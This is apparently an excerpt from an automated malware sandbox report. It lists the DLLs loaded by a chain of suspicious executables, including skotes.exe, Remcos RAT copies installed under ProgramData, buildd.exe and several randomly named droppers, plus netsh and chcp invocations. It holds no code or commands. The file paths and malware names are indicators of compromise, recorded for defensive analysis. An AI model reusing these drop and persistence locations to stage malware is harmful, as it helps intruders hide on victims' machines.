Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Section loaded: netutils.dll
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: winmm.dll
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: netutils.dll
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: wininet.dll
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\Remcos\remcos.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Section loaded: ncrypt.dll
